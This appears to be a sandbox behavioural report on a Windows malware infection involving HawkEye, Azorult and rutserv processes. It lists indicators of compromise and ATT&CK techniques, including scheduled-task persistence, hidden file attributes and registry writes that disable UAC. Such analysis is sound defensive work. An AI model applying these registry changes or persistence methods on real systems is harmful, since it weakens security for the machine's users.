File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNewNoteSmallTile.scale-125.png	HawkEye.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2564	sc.exe
1088	sc.exe
1196	sc.exe
4392	sc.exe
4292	sc.exe
4892	sc.exe
6000	sc.exe
4544	sc.exe
5544	sc.exe
5404	sc.exe
3348	sc.exe
1576	sc.exe
5496	sc.exe
848	sc.exe
5208	sc.exe
5796	sc.exe
1244	sc.exe
5096	sc.exe
180	sc.exe
1044	sc.exe
4648	sc.exe
5008	sc.exe
4320	sc.exe
840	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HawkEye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	R8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogon.exe

Delays execution with timeout.exe 6 IoCs

pid	Process
4052	timeout.exe
4920	timeout.exe
2956	timeout.exe
1736	timeout.exe
2596	timeout.exe
5108	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 5 IoCs

pid	Process
916	taskkill.exe
1652	taskkill.exe
1556	taskkill.exe
3164	taskkill.exe
5212	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	cmd.exe

NTFS ADS 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 526711.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 848475.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 696808.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 899818.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 275007.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 935184.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 304527.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 834294.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
2372	regedit.exe
552	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1904	schtasks.exe
1620	schtasks.exe
5248	schtasks.exe
5464	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3140	msedge.exe
3140	msedge.exe
3640	msedge.exe
3640	msedge.exe
3596	identity_helper.exe
3596	identity_helper.exe
1432	msedge.exe
1432	msedge.exe
1432	msedge.exe
1432	msedge.exe
2312	msedge.exe
2312	msedge.exe
552	msedge.exe
552	msedge.exe
4388	msedge.exe
4388	msedge.exe
3504	msedge.exe
3504	msedge.exe
384	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
384	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
384	Azorult.exe
4624	Azorult.exe
4624	Azorult.exe
4624	Azorult.exe
6000	rutserv.exe
6000	rutserv.exe
6000	rutserv.exe
6000	rutserv.exe
6000	rutserv.exe
6000	rutserv.exe
972	rutserv.exe
972	rutserv.exe
1152	rutserv.exe
1152	rutserv.exe
1148	rutserv.exe
1148	rutserv.exe
1148	rutserv.exe
1148	rutserv.exe
1148	rutserv.exe
1148	rutserv.exe
2508	rfusclient.exe
2508	rfusclient.exe
1620	msedge.exe
1620	msedge.exe
384	Azorult.exe
384	Azorult.exe
384	Azorult.exe
384	Azorult.exe
384	Azorult.exe
384	Azorult.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3640	msedge.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs

pid	Process
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4684	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4852	takeown.exe
Token: SeDebugPrivilege	5872	HawkEye.exe
Token: SeDebugPrivilege	5192	HawkEye.exe
Token: SeDebugPrivilege	848	HawkEye.exe
Token: SeDebugPrivilege	2012	HawkEye.exe
Token: SeDebugPrivilege	5180	HawkEye.exe
Token: SeDebugPrivilege	5152	HawkEye.exe
Token: SeDebugPrivilege	6000	rutserv.exe
Token: SeDebugPrivilege	1152	rutserv.exe
Token: SeTakeOwnershipPrivilege	1148	rutserv.exe
Token: SeTcbPrivilege	1148	rutserv.exe
Token: SeTcbPrivilege	1148	rutserv.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	5212	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
2552	rfusclient.exe
2552	rfusclient.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe

Suspicious use of SetWindowsHookEx 35 IoCs

pid	Process
384	Azorult.exe
4624	Azorult.exe
3304	wini.exe
2396	winit.exe
3268	cheat.exe
3836	taskhost.exe
116	P.exe
164	ink.exe
6000	rutserv.exe
972	rutserv.exe
1152	rutserv.exe
1148	rutserv.exe
516	R8.exe
224	winlogon.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3640 wrote to memory of 3452	3640	msedge.exe	85
PID 3640 wrote to memory of 3452	3640	msedge.exe	85
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 2512	3640	msedge.exe	86
PID 3640 wrote to memory of 3140	3640	msedge.exe	87
PID 3640 wrote to memory of 3140	3640	msedge.exe	87
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88
PID 3640 wrote to memory of 1756	3640	msedge.exe	88

System policy modification 1 TTPs 3 IoCs

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Views/modifies file attributes 1 TTPs 6 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5592	attrib.exe
412	attrib.exe
4456	attrib.exe
2372	attrib.exe
5108	attrib.exe
396	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://SEX.COM
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd119a46f8,0x7ffd119a4708,0x7ffd119a4718
  2⤵
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
